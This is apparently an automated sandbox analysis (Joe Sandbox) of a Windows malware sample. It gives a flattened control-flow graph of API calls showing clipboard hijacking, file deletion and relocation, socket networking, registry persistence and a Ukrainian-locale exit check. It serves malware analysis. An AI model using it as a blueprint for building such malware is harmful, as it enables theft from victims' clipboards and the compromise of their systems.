PathMatchSpecW 5384 406a26 wsprintfW SetFileAttributesW DeleteFileW 5382->5384 5382->5387 5383 406a83 PathFileExistsW 5385 406a99 wsprintfW wsprintfW 5383->5385 5383->5387 5384->5387 5386 406b03 MoveFileExW 5385->5386 5385->5387 5386->5378 5387->5372 5387->5378 5387->5381 5387->5382 5387->5383 5398 406510 CreateDirectoryW wsprintfW FindFirstFileW 5387->5398 5390 4062e8 5389->5390 5393 40629f 5389->5393 5391 4062fc QueryDosDeviceW 5390->5391 5390->5393 5392 406316 StrCmpNW 5391->5392 5391->5393 5392->5393 5393->5349 5393->5353 5395 406436 5394->5395 5397 406472 5394->5397 5396 406440 wsprintfW 5395->5396 5395->5397 5396->5397 5397->5377 5399 406565 lstrcmpW 5398->5399 5400 40663f 5398->5400 5401 406591 5399->5401 5402 40657b lstrcmpW 5399->5402 5400->5387 5404 40660c FindNextFileW 5401->5404 5402->5401 5403 406593 wsprintfW wsprintfW 5402->5403 5403->5401 5406 4065f6 MoveFileExW 5403->5406 5404->5399 5405 406628 FindClose RemoveDirectoryW 5404->5405 5405->5400 5406->5404 5407 40d440 5412 40d444 5407->5412 5409 40d460 WaitForSingleObject 5411 40d485 5409->5411 5409->5412 5412->5409 5412->5411 5413 40b790 EnterCriticalSection 5412->5413 5418 40d060 InterlockedExchangeAdd 5412->5418 5414 40b7c7 LeaveCriticalSection 5413->5414 5415 40b7af 5413->5415 5414->5412 5416 40c450 3 API calls 5415->5416 5417 40b7ba 5416->5417 5417->5414 5419 40d07d 5418->5419 5429 40d076 5418->5429 5435 40d350 5419->5435 5422 40d09d InterlockedIncrement 5432 40d0a7 5422->5432 5424 40d0d0 5445 40afb0 inet_ntoa 5424->5445 5426 40d0dc 5427 40d1a0 InterlockedDecrement 5426->5427 5460 40b0d0 shutdown closesocket 5427->5460 5429->5412 5430 40a530 __aligned_recalloc_base 7 API calls 5430->5432 5431 40d280 6 API calls 5431->5432 5432->5424 5432->5427 5432->5430 5432->5431 5434 40a740 _invalid_parameter 3 API calls 5432->5434 5442 40bab0 5432->5442 5446 40bb00 5432->5446 5434->5432 5436 40d35d socket 5435->5436 5437 40d372 htons connect 5436->5437 5438 40d3cf 5436->5438 5437->5438 5439 40d3ba 5437->5439 
5438->5436 5440 40d08d 5438->5440 5461 40b0d0 shutdown closesocket 5439->5461 5440->5422 5440->5429 5462 40ba10 5442->5462 5445->5426 5456 40bb11 5446->5456 5448 40bb2f 5450 40a740 _invalid_parameter 3 API calls 5448->5450 5451 40bedf 5450->5451 5451->5432 5452 40bef0 21 API calls 5452->5456 5455 40bab0 13 API calls 5455->5456 5456->5448 5456->5452 5456->5455 5457 40b410 32 API calls 5456->5457 5470 40c040 5456->5470 5477 40b7e0 EnterCriticalSection 5456->5477 5482 406e20 5456->5482 5487 406ec0 5456->5487 5492 406cf0 5456->5492 5499 406df0 5456->5499 5457->5456 5460->5429 5461->5440 5463 40c490 3 API calls 5462->5463 5464 40ba1b 5463->5464 5465 40ba37 lstrlenA 5464->5465 5466 40c720 7 API calls 5465->5466 5467 40ba6d 5466->5467 5468 40ba98 5467->5468 5469 40a740 _invalid_parameter 3 API calls 5467->5469 5468->5432 5469->5468 5471 40c051 lstrlenA 5470->5471 5472 40c720 7 API calls 5471->5472 5476 40c06f 5472->5476 5473 40c07b 5474 40c0ff 5473->5474 5475 40a740 _invalid_parameter 3 API calls 5473->5475 5474->5456 5475->5474 5476->5471 5476->5473 5480 40b7f8 5477->5480 5478 40b834 LeaveCriticalSection 5478->5456 5480->5478 5502 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5480->5502 5481 40b823 5481->5478 5503 406e60 5482->5503 5485 406e59 5485->5456 5486 40d6f0 17 API calls 5486->5485 5488 406e60 75 API calls 5487->5488 5489 406edf 5488->5489 5490 406f0c 5489->5490 5518 406f20 5489->5518 5490->5456 5521 405f40 EnterCriticalSection 5492->5521 5494 406d0a 5495 406d3d 5494->5495 5526 406d50 5494->5526 5495->5456 5498 40a740 _invalid_parameter 3 API calls 5498->5495 5533 406000 EnterCriticalSection 5499->5533 5501 406e12 5501->5456 5502->5481 5506 406e73 5503->5506 5504 406e34 5504->5485 5504->5486 5506->5504 5507 405e50 EnterCriticalSection 5506->5507 5508 40cdb0 71 API calls 5507->5508 5509 405e6e 5508->5509 5510 405f2b LeaveCriticalSection 5509->5510 5511 405e87 5509->5511 5514 405ea8 5509->5514 5510->5506 5512 405e91 memcpy 5511->5512 5513 405ea6 5511->5513 
5512->5513 5515 40a740 _invalid_parameter 3 API calls 5513->5515 5514->5513 5517 405f06 memcpy 5514->5517 5516 405f28 5515->5516 5516->5510 5517->5513 5519 40ba10 13 API calls 5518->5519 5520 406f65 5519->5520 5520->5490 5522 405f5e 5521->5522 5523 405fea LeaveCriticalSection 5522->5523 5524 40a7b0 8 API calls 5522->5524 5523->5494 5525 405fbc 5524->5525 5525->5523 5527 40a530 __aligned_recalloc_base 7 API calls 5526->5527 5528 406d62 memcpy 5527->5528 5529 40ba10 13 API calls 5528->5529 5530 406dcc 5529->5530 5531 40a740 _invalid_parameter 3 API calls 5530->5531 5532 406d31 5531->5532 5532->5498 5558 40ce10 5533->5558 5536 406243 LeaveCriticalSection 5536->5501 5537 40cdb0 71 API calls 5538 406039 5537->5538 5538->5536 5539 406094 memcpy 5538->5539 5557 406158 5538->5557 5542 40a740 _invalid_parameter 3 API calls 5539->5542 5540 405c90 75 API calls 5543 406181 5540->5543 5541 40a740 _invalid_parameter 3 API calls 5544 4061a2 5541->5544 5545 4060b8 5542->5545 5543->5541 5544->5536 5546 4061b1 CreateFileW 5544->5546 5547 40a7b0 8 API calls 5545->5547 5546->5536 5548 4061d4 5546->5548 5549 4060c8 5547->5549 5552 4061f1 WriteFile 5548->5552 5553 40622f FlushFileBuffers CloseHandle 5548->5553 5550 40a740 _invalid_parameter 3 API calls 5549->5550 5551 4060ef 5550->5551 5554 40c720 7 API calls 5551->5554 5552->5548 5553->5536 5555 406125 5554->5555 5556 4072a0 71 API calls 5555->5556 5556->5557 5557->5540 5557->5543 5561 40c360 5558->5561 5565 40c371 5561->5565 5562 40a7b0 8 API calls 5562->5565 5563 40c38b 5566 40a740 _invalid_parameter 3 API calls 5563->5566 5564 40c2c0 70 API calls 5564->5565 5565->5562 5565->5563 5565->5564 5568 408080 68 API calls 5565->5568 5569 40c3cb memcmp 5565->5569 5567 406022 5566->5567 5567->5536 5567->5537 5568->5565 5569->5563 5569->5565 5570 40d1c0 5575 40d220 5570->5575 5573 40d1ee 5574 40d220 send 5574->5573 5576 40d231 send 5575->5576 5577 40d1d3 5576->5577 5578 40d24e 5576->5578 5577->5573 5577->5574 5578->5576 5578->5577 5798 40db80 
5804 401470 5798->5804 5800 40db94 5801 40dba5 WaitForSingleObject 5800->5801 5803 40dbbf 5800->5803 5802 401330 8 API calls 5801->5802 5802->5803 5805 401483 5804->5805 5806 401572 5804->5806 5805->5806 5807 40a320 7 API calls 5805->5807 5806->5800 5808 401498 CreateEventA socket 5807->5808 5809 4014d5 5808->5809 5810 4014cf 5808->5810 5809->5806 5812 4014e2 htons setsockopt bind 5809->5812 5811 401330 8 API calls 5810->5811 5811->5809 5813 401546 5812->5813 5814 401558 CreateThread 5812->5814 5815 401330 8 API calls 5813->5815 5814->5806 5817 401100 20 API calls _invalid_parameter 5814->5817 5816 40154c 5815->5816 5816->5800 5579 4069c8 5586 40696e 5579->5586 5580 40699e lstrcmpiW 5580->5586 5581 406b19 FindNextFileW 5582 406942 lstrcmpW 5581->5582 5583 406b35 FindClose 5581->5583 5585 406958 lstrcmpW 5582->5585 5582->5586 5588 406b42 5583->5588 5584 406a05 PathMatchSpecW 5584->5586 5589 406a26 wsprintfW SetFileAttributesW DeleteFileW 5584->5589 5585->5586 5586->5580 5586->5581 5586->5584 5587 406a83 PathFileExistsW 5586->5587 5592 406510 11 API calls 5586->5592 5587->5586 5590 406a99 wsprintfW wsprintfW 5587->5590 5589->5586 5590->5586 5591 406b03 MoveFileExW 5590->5591 5591->5581 5592->5586 5593 401f50 GetQueuedCompletionStatus 5594 401f92 5593->5594 5595 402008 5593->5595 5596 401f97 WSAGetOverlappedResult 5594->5596 5600 401d60 5594->5600 5596->5594 5597 401fb9 WSAGetLastError 5596->5597 5597->5594 5599 401fd3 GetQueuedCompletionStatus 5599->5594 5599->5595 5601 401ef2 InterlockedDecrement setsockopt closesocket 5600->5601 5602 401d74 5600->5602 5619 401e39 5601->5619 5602->5601 5603 401d7c 5602->5603 5620 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5603->5620 5605 401d81 InterlockedExchange 5606 401d98 5605->5606 5607 401e4e 5605->5607 5612 401da9 InterlockedDecrement 5606->5612 5613 401dbc InterlockedDecrement InterlockedExchangeAdd 5606->5613 5606->5619 5608 401e67 5607->5608 5609 401e57 InterlockedDecrement 5607->5609 5610 401e72 5608->5610 5611 
401e87 InterlockedDecrement 5608->5611 5609->5599 5629 401ae0 WSASend 5610->5629 5615 401ee9 5611->5615 5612->5599 5616 401e2f 5613->5616 5615->5599 5621 401cf0 5616->5621 5617 401e7e 5617->5599 5619->5599 5620->5605 5622 401d00 InterlockedExchangeAdd 5621->5622 5623 401cfc 5621->5623 5624 401d53 5622->5624 5625 401d17 InterlockedIncrement 5622->5625 5623->5619 5624->5619 5635 401c50 WSARecv 5625->5635 5627 401d46 5627->5624 5628 401d4c InterlockedDecrement 5627->5628 5628->5624 5630 401b50 5629->5630 5631 401b12 WSAGetLastError 5629->5631 5630->5617 5631->5630 5632 401b1f 5631->5632 5633 401b56 5632->5633 5634 401b26 Sleep WSASend 5632->5634 5633->5617 5634->5630 5634->5631 5636 401cd2 5635->5636 5637 401c8e 5635->5637 5636->5627 5638 401c90 WSAGetLastError 5637->5638 5639 401ca4 Sleep WSARecv 5637->5639 5640 401cdb 5637->5640 5638->5636 5638->5637 5639->5636 5639->5638 5640->5627 5818 40d490 5824 4021b0 5818->5824 5821 40d4cf 5822 40d4b5 WaitForSingleObject 5828 401600 5822->5828 5825 4021bb 5824->5825 5827 4021cf 5824->5827 5825->5827 5849 402020 5825->5849 5827->5821 5827->5822 5829 401737 5828->5829 5830 40160d 5828->5830 5829->5821 5830->5829 5831 401619 EnterCriticalSection 5830->5831 5832 4016b5 LeaveCriticalSection SetEvent 5831->5832 5837 401630 5831->5837 5833 4016d0 5832->5833 5834 4016e8 5832->5834 5835 4016d6 PostQueuedCompletionStatus 5833->5835 5836 40d860 11 API calls 5834->5836 5835->5834 5835->5835 5839 4016f3 5836->5839 5837->5832 5838 401641 InterlockedDecrement 5837->5838 5840 40165a InterlockedExchangeAdd 5837->5840 5847 4016a0 InterlockedDecrement 5837->5847 5838->5837 5841 40d9a0 7 API calls 5839->5841 5840->5837 5842 40166d InterlockedIncrement 5840->5842 5843 4016fc CloseHandle CloseHandle WSACloseEvent 5841->5843 5844 401c50 4 API calls 5842->5844 5870 40b0d0 shutdown closesocket 5843->5870 5844->5837 5846 401724 DeleteCriticalSection 5848 40a740 _invalid_parameter 3 API calls 5846->5848 5847->5837 5848->5829 5850 40a320 7 API calls 
5849->5850 5851 40202b 5850->5851 5852 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5851->5852 5858 4021a5 5851->5858 5853 402076 CreateIoCompletionPort 5852->5853 5854 40219f 5852->5854 5853->5854 5855 40208f 5853->5855 5856 401600 36 API calls 5854->5856 5857 40d6c0 8 API calls 5855->5857 5856->5858 5859 402094 5857->5859 5858->5827 5859->5854 5860 40209f WSASocketA 5859->5860 5860->5854 5861 4020bd setsockopt htons bind 5860->5861 5861->5854 5862 402126 listen 5861->5862 5862->5854 5863 40213a WSACreateEvent 5862->5863 5863->5854 5864 402147 WSAEventSelect 5863->5864 5864->5854 5868 402159 5864->5868 5865 40217f 5866 40d6f0 17 API calls 5865->5866 5869 402194 5866->5869 5867 40d6f0 17 API calls 5867->5868 5868->5865 5868->5867 5869->5827 5870->5846 5871 405910 GetWindowLongW 5872 405934 5871->5872 5873 405956 5871->5873 5874 405941 5872->5874 5875 4059c7 IsClipboardFormatAvailable 5872->5875 5876 405951 5873->5876 5882 4059a6 5873->5882 5883 40598e SetWindowLongW 5873->5883 5879 405964 SetClipboardViewer SetWindowLongW 5874->5879 5880 405947 5874->5880 5877 4059e3 IsClipboardFormatAvailable 5875->5877 5878 4059da 5875->5878 5881 405b44 DefWindowProcA 5876->5881 5877->5878 5885 4059f8 IsClipboardFormatAvailable 5877->5885 5887 405a15 OpenClipboard 5878->5887 5888 405adc 5878->5888 5879->5881 5880->5876 5886 405afd RegisterRawInputDevices ChangeClipboardChain 5880->5886 5882->5876 5884 4059ac SendMessageA 5882->5884 5883->5876 5884->5876 5885->5878 5886->5881 5887->5888 5890 405a25 GetClipboardData 5887->5890 5888->5876 5889 405ae5 SendMessageA 5888->5889 5889->5876 5890->5876 5891 405a3d GlobalLock 5890->5891 5891->5876 5892 405a55 5891->5892 5893 405a68 5892->5893 5894 405a89 5892->5894 5895 405a9e 5893->5895 5896 405a6e 5893->5896 5897 405630 13 API calls 5894->5897 5912 405750 5895->5912 5898 405a74 GlobalUnlock CloseClipboard 5896->5898 5906 405510 5896->5906 5897->5898 5898->5888 5902 405ac7 5898->5902 5920 4048a0 lstrlenW 5902->5920 5905 
40a740 _invalid_parameter 3 API calls 5905->5888 5907 40551b 5906->5907 5908 405521 lstrlenW 5907->5908 5909 40a530 __aligned_recalloc_base 7 API calls 5907->5909 5910 405551 lstrcpynW 5907->5910 5911 405534 5907->5911 5908->5907 5908->5911 5909->5907 5910->5907 5910->5911 5911->5898 5917 40575d 5912->5917 5913 405763 lstrlenA 5913->5917 5918 405776 5913->5918 5914 4055d0 2 API calls 5914->5917 5915 40a530 __aligned_recalloc_base 7 API calls 5915->5917 5917->5913 5917->5914 5917->5915 5917->5918 5919 40a740 _invalid_parameter 3 API calls 5917->5919 5957 405700 5917->5957 5918->5898 5919->5917 5927 4048d4 5920->5927 5921 404d5e StrStrW 5922 404d71 5921->5922 5923 404d75 StrStrW 5921->5923 5922->5923 5925 404d88 5923->5925 5926 404d8c StrStrW 5923->5926 5924 404ae2 5924->5905 5925->5926 5928 404d9f 5926->5928 5927->5924 5931 404c69 StrStrW 5927->5931 5934 404af4 5927->5934 5928->5924 5929 404e09 isalpha 5928->5929 5937 404e43 5928->5937 5929->5928 5930 404e20 isdigit 5929->5930 5930->5924 5930->5928 5932 404c94 StrStrW 5931->5932 5931->5934 5933 404cbf StrStrW 5932->5933 5932->5934 5933->5934 5934->5921 5934->5924 5935 405351 StrStrW 5940 405364 5935->5940 5941 40536b StrStrW 5935->5941 5936 405303 StrStrW 5938 405316 5936->5938 5939 40531d StrStrW 5936->5939 5937->5935 5937->5936 5938->5939 5942 405330 5939->5942 5943 405337 StrStrW 5939->5943 5940->5941 5944 405385 StrStrW 5941->5944 5945 40537e 5941->5945 5942->5943 5943->5935 5948 40534a 5943->5948 5946 405398 5944->5946 5947 40539f StrStrW 5944->5947 5945->5944 5946->5947 5949 4053b2 5947->5949 5950 4053b9 StrStrW 5947->5950 5948->5935 5949->5950 5951 4053cc lstrlenA 5950->5951 5951->5924 5953 405492 GlobalAlloc 5951->5953 5953->5924 5954 4054ad GlobalLock 5953->5954 5954->5924 5955 4054c0 memcpy GlobalUnlock OpenClipboard 5954->5955 5955->5924 5956 4054ed EmptyClipboard SetClipboardData CloseClipboard 5955->5956 5956->5924 5958 40570b 5957->5958 5959 405711 lstrlenA 5958->5959 5960 4055d0 2 API calls 5958->5960 
5961 405744 5958->5961 5959->5958 5960->5958 5961->5917 5641 4080d9 5642 4080e2 5641->5642 5643 4080f1 34 API calls 5642->5643 5644 408f26 5642->5644 5974 405f1d 5976 405eb1 5974->5976 5975 405f1b 5977 40a740 _invalid_parameter 3 API calls 5975->5977 5976->5975 5979 405f06 memcpy 5976->5979 5978 405f28 LeaveCriticalSection 5977->5978 5979->5975 5981 40a81e 5982 40a740 _invalid_parameter 3 API calls 5981->5982 5983 40a7dd 5982->5983 5984 40a530 __aligned_recalloc_base 7 API calls 5983->5984 5985 40a7f2 5983->5985 5986 40a7f4 memcpy 5983->5986 5984->5983 5986->5983 5645 40d660 5650 401b60 5645->5650 5647 40d675 5648 40d694 5647->5648 5649 401b60 16 API calls 5647->5649 5649->5648 5651 401c42 5650->5651 5652 401b70 5650->5652 5651->5647 5652->5651 5653 40a320 7 API calls 5652->5653 5654 401b9d 5653->5654 5654->5651 5655 40a7b0 8 API calls 5654->5655 5656 401bc9 5655->5656 5657 401be6 5656->5657 5658 401bd6 5656->5658 5660 401ae0 4 API calls 5657->5660 5659 40a740 _invalid_parameter 3 API calls 5658->5659 5661 401bdc 5659->5661 5662 401bf3 5660->5662 5661->5647 5663 401c33 5662->5663 5664 401bfc EnterCriticalSection 5662->5664 5667 40a740 _invalid_parameter 3 API calls 5663->5667 5665 401c13 5664->5665 5666 401c1f LeaveCriticalSection 5664->5666 5665->5666 5666->5647 5668 401c3c 5667->5668 5669 40a740 _invalid_parameter 3 API calls 5668->5669 5669->5651 5670 40da60 5671 40bb00 194 API calls 5670->5671 5672 40da98 5671->5672 5673 40dae0 5683 4013b0 5673->5683 5675 40daed 5676 40b790 5 API calls 5675->5676 5677 40db07 InterlockedExchangeAdd 5675->5677 5678 40db4b WaitForSingleObject 5675->5678 5680 40bab0 13 API calls 5675->5680 5682 40db6d 5675->5682 5676->5675 5677->5675 5677->5678 5678->5675 5679 40db64 5678->5679 5695 401330 5679->5695 5680->5675 5684 40a320 7 API calls 5683->5684 5685 4013bb CreateEventA socket 5684->5685 5686 4013f2 5685->5686 5687 4013f8 5685->5687 5688 401330 8 API calls 5686->5688 5689 401401 bind 5687->5689 5690 401462 5687->5690 5688->5687 
5691 401444 CreateThread 5689->5691 5692 401434 5689->5692 5690->5675 5691->5690 5705 401100 5691->5705 5693 401330 8 API calls 5692->5693 5694 40143a 5693->5694 5694->5675 5696 401339 5695->5696 5697 40139b 5695->5697 5696->5697 5698 401341 SetEvent WaitForSingleObject CloseHandle 5696->5698 5697->5682 5699 40138b 5698->5699 5703 401369 5698->5703 5734 40b0d0 shutdown closesocket 5699->5734 5701 40a740 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5701->5703 5702 401395 5704 40a740 _invalid_parameter 3 API calls 5702->5704 5703->5699 5703->5701 5704->5697 5706 401115 ioctlsocket 5705->5706 5707 4011e4 5706->5707 5713 40113a 5706->5713 5708 40a740 _invalid_parameter 3 API calls 5707->5708 5710 4011ea 5708->5710 5709 4011cd WaitForSingleObject 5709->5706 5709->5707 5711 40a570 9 API calls 5711->5713 5712 401168 recvfrom 5712->5709 5712->5713 5713->5709 5713->5711 5713->5712 5714 4011ad InterlockedExchangeAdd 5713->5714 5716 401000 5714->5716 5717 401014 5716->5717 5718 40103b 5717->5718 5719 40a320 7 API calls 5717->5719 5727 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5718->5727 5719->5718 5721 40105b 5728 401580 5721->5728 5723 4010ec 5723->5713 5724 401071 5724->5723 5725 4010a3 IsBadReadPtr 5724->5725 5726 4010d8 memmove 5724->5726 5725->5724 5726->5724 5727->5721 5729 401592 5728->5729 5730 4015a5 memcpy 5728->5730 5731 40a570 9 API calls 5729->5731 5732 4015c1 5730->5732 5733 40159f 5731->5733 5732->5724 5733->5730 5734->5702 5735 40d4e0 5736 40d54e 5735->5736 5737 40d4f6 5735->5737 5737->5736 5738 40d500 5737->5738 5739 40d553 5737->5739 5740 40d5a3 5737->5740 5741 40a320 7 API calls 5738->5741 5743 40d578 5739->5743 5744 40d56b InterlockedDecrement 5739->5744 5769 40c150 5740->5769 5745 40d50d 5741->5745 5747 40a740 _invalid_parameter 3 API calls 5743->5747 5744->5743 5758 4023d0 5745->5758 5746 40d5c9 5746->5736 5756 40d601 IsBadReadPtr 5746->5756 5757 40bb00 194 API calls 5746->5757 5774 40c250 5746->5774 5749 40d584 5747->5749 5750 
40a740 _invalid_parameter 3 API calls 5749->5750 5750->5736 5754 40d53b InterlockedIncrement 5754->5736 5756->5746 5757->5746 5759 402413 5758->5759 5760 4023d9 5758->5760 5762 40b2d0 5759->5762 5760->5759 5761 4023ea InterlockedIncrement 5760->5761 5761->5759 5763 40b360 2 API calls 5762->5763 5764 40b2df 5763->5764 5765 40b2e9 5764->5765 5766 40b2ed EnterCriticalSection 5764->5766 5765->5736 5765->5754 5767 40b30c LeaveCriticalSection 5766->5767 5767->5765 5770 40c163 5769->5770 5771 40c18d memcpy 5769->5771 5772 40a570 9 API calls 5770->5772 5771->5746 5773 40c184 5772->5773 5773->5771 5775 40c279 5774->5775 5776 40c26e 5774->5776 5775->5776 5777 40c291 memmove 5775->5777 5776->5746 5777->5776 5987 40d020 5988 40b2d0 4 API calls 5987->5988 5989 40d033 5988->5989 5990 40d060 208 API calls 5989->5990 5991 40d04a 5989->5991 5990->5991 5992 401920 GetTickCount WaitForSingleObject 5993 401ac9 5992->5993 5994 40194d WSAWaitForMultipleEvents 5992->5994 5995 4019f0 GetTickCount 5994->5995 5996 40196a WSAEnumNetworkEvents 5994->5996 5997 401a43 GetTickCount 5995->5997 5998 401a05 EnterCriticalSection 5995->5998 5996->5995 6012 401983 5996->6012 5999 401ab5 WaitForSingleObject 5997->5999 6000 401a4e EnterCriticalSection 5997->6000 6001 401a16 5998->6001 6002 401a3a LeaveCriticalSection 5998->6002 5999->5993 5999->5994 6004 401aa1 LeaveCriticalSection GetTickCount 6000->6004 6005 401a5f InterlockedExchangeAdd 6000->6005 6006 401a29 LeaveCriticalSection 6001->6006 6034 401820 6001->6034 6002->5999 6003 401992 accept 6003->5995 6003->6012 6004->5999 6052 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 6005->6052 6006->5999 6010 401a72 6010->6004 6010->6005 6053 40b0d0 shutdown closesocket 6010->6053 6012->5995 6012->6003 6013 401cf0 7 API calls 6012->6013 6014 4022c0 6012->6014 6013->5995 6015 4022d2 EnterCriticalSection 6014->6015 6016 4022cd 6014->6016 6017 4022e7 6015->6017 6018 4022fd LeaveCriticalSection 6015->6018 6016->6012 6017->6018 6019 402308 6018->6019 6020 
40230f 6018->6020 6019->6012 6021 40a320 7 API calls 6020->6021 6022 402319 6021->6022 6023 402326 getpeername CreateIoCompletionPort 6022->6023 6024 4023b8 6022->6024 6025 4023b2 6023->6025 6026 402366 6023->6026 6056 40b0d0 shutdown closesocket 6024->6056 6029 40a740 _invalid_parameter 3 API calls 6025->6029 6054 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 6026->6054 6029->6024 6030 4023c3 6030->6012 6031 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6055 4021e0 EnterCriticalSection LeaveCriticalSection 6031->6055 6033 4023ab 6033->6012 6035 40190f 6034->6035 6036 401830 6034->6036 6035->6002 6036->6035 6037 40183d InterlockedExchangeAdd 6036->6037 6037->6035 6043 401854 6037->6043 6038 401880 6039 401891 6038->6039 6066 40b0d0 shutdown closesocket 6038->6066 6041 4018a7 InterlockedDecrement 6039->6041 6044 401901 6039->6044 6041->6044 6043->6035 6043->6038 6057 4017a0 EnterCriticalSection 6043->6057 6045 402247 6044->6045 6046 402265 EnterCriticalSection 6044->6046 6045->6002 6047 40229c LeaveCriticalSection DeleteCriticalSection 6046->6047 6050 40227d 6046->6050 6048 40a740 _invalid_parameter 3 API calls 6047->6048 6048->6045 6049 40a740 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 6049->6050 6050->6049 6051 40229b 6050->6051 6051->6047 6052->6010 6053->6010 6054->6031 6055->6033 6056->6030 6058 401807 LeaveCriticalSection 6057->6058 6059 4017ba InterlockedExchangeAdd 6057->6059 6058->6043 6060 4017ca LeaveCriticalSection 6059->6060 6061 4017d9 6059->6061 6060->6043 6062 40a740 _invalid_parameter 3 API calls 6061->6062 6063 4017fe 6062->6063 6064 40a740 _invalid_parameter 3 API calls 6063->6064 6065 401804 6064->6065 6065->6058 6066->6039 5778 405fe5 5779 405f5e 5778->5779 5780 405fea LeaveCriticalSection 5779->5780 5781 40a7b0 8 API calls 5779->5781 5782 405fbc 5781->5782 5782->5780 6067 406ba6 6070 406b88 6067->6070 6068 406cc8 Sleep 6068->6070 6069 406bb9 6071 406260 4 API calls 6069->6071 6070->6068 
6070->6069 6072 406cd8 ExitThread 6070->6072 6074 406340 4 API calls 6070->6074 6073 406bca 6071->6073 6075 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6073->6075 6078 406beb 6073->6078 6074->6070 6076 406c66 wsprintfW 6075->6076 6077 406c7b wsprintfW 6075->6077 6076->6077 6079 406650 51 API calls 6077->6079 6079->6078 6080 40f42c 6081 40f434 6080->6081 6082 40f4e8 6081->6082 6086 40f669 6081->6086 6085 40f46d 6085->6082 6090 40f554 RtlUnwind 6085->6090 6087 40f67e 6086->6087 6089 40f69a 6086->6089 6088 40f709 NtQueryVirtualMemory 6087->6088 6087->6089 6088->6089 6089->6085 6091 40f56c 6090->6091 6091->6085 6092 40dab0 6095 401200 6092->6095 6094 40dad2 6096 401314 6095->6096 6097 40121d 6095->6097 6096->6094 6097->6096 6098 40a530 __aligned_recalloc_base 7 API calls 6097->6098 6099 401247 memcpy htons 6098->6099 6100 4012ed 6099->6100 6101 401297 sendto 6099->6101 6104 40a740 _invalid_parameter 3 API calls 6100->6104 6102 4012b6 InterlockedExchangeAdd 6101->6102 6103 4012e9 6101->6103 6102->6101 6105 4012cc 6102->6105 6103->6100 6106 40130a 6103->6106 6107 4012fc 6104->6107 6109 40a740 _invalid_parameter 3 API calls 6105->6109 6108 40a740 _invalid_parameter 3 API calls 6106->6108 6107->6094 6108->6096 6110 4012db 6109->6110 6110->6094 6111 40b9b0 6112 40b9b3 WaitForSingleObject 6111->6112 6113 40b9e1 6112->6113 6114 40b9cb InterlockedDecrement 6112->6114 6115 40b9da 6114->6115 6115->6112 6116 40b0f0 16 API calls 6115->6116 6116->6115 5797 4074f1 ExitThread 6117 40e6b1 6119 40e6ba 6117->6119 6118 40e7ad 6119->6118 6120 40e723 lstrcmpiW 6119->6120 6121 40e7a3 SysFreeString 6120->6121 6122 40e736 6120->6122 6121->6118 6123 40e4a0 2 API calls 6122->6123 6125 40e744 6123->6125 6124 40e795 6124->6121 6125->6121 6125->6124 6126 40e773 lstrcmpiW 6125->6126 6127 40e785 6126->6127 6128 40e78b SysFreeString 6126->6128 6127->6128 6128->6124 6129 40f434 6130 40f452 6129->6130 6131 40f4e8 6129->6131 6132 40f669 NtQueryVirtualMemory 6130->6132 6134 40f46d 
6132->6134 6133 40f554 RtlUnwind 6133->6134 6134->6131 6134->6133

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 95 40ecc0-40ecec GetLocaleInfoA strcmp 96 40ecf2 95->96 97 40ecee-40ecf0 95->97 98 40ecf4-40ecf7 96->98 97->98
                                              APIs
                                              • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,004075E8), ref: 0040ECD3
                                              • strcmp.NTDLL ref: 0040ECE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocalestrcmp
                                              • String ID: UKR
                                              • API String ID: 3191669094-64918367
                                              • Opcode ID: 54f5cdf661095b57fe809351cef4458ab0cf24a1f510da97d06a6553b22e766c
                                              • Instruction ID: 77034b4ee665358b2559d06917653f26683f777e377fe2659d333d0cc479d80c
                                              • Opcode Fuzzy Hash: 54f5cdf661095b57fe809351cef4458ab0cf24a1f510da97d06a6553b22e766c
                                              • Instruction Fuzzy Hash: 19E02B32E4830876FA10BAA5AC03FEA375C9711701F000176FF05F21C1F6BA922A979B

                                              Control-flow Graph

                                              control_flow_graph 0 407500-407534 Sleep CreateMutexA GetLastError 1 407536-407538 ExitProcess 0->1 2 40753e-4075dd GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 4075e3-4075ee call 40ecc0 2->3 4 4078a9-4078d4 Sleep RegOpenKeyExW 2->4 11 4075f0-4075f2 ExitProcess 3->11 12 4075f8-407646 ExpandEnvironmentStringsW wsprintfW CopyFileW 3->12 6 407902-407922 RegOpenKeyExW 4->6 7 4078d6-4078fc RegSetValueExA RegCloseKey 4->7 9 407950-407970 RegOpenKeyExW 6->9 10 407924-40794a RegSetValueExA RegCloseKey 6->10 7->6 13 407972-407998 RegSetValueExA RegCloseKey 9->13 14 40799e-4079be RegOpenKeyExW 9->14 10->9 15 40764c-40767b SetFileAttributesW RegOpenKeyExW 12->15 16 4076de-407720 Sleep wsprintfW CopyFileW 12->16 13->14 17 4079c0-4079e6 RegSetValueExA RegCloseKey 14->17 18 4079ec-407a0c RegOpenKeyExW 14->18 15->16 21 40767d-4076b0 wcslen RegSetValueExW 15->21 22 407726-407755 SetFileAttributesW RegOpenKeyExW 16->22 23 4077b8-407811 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 16->23 17->18 19 407a0e-407a3a RegSetValueExA RegCloseKey 18->19 20 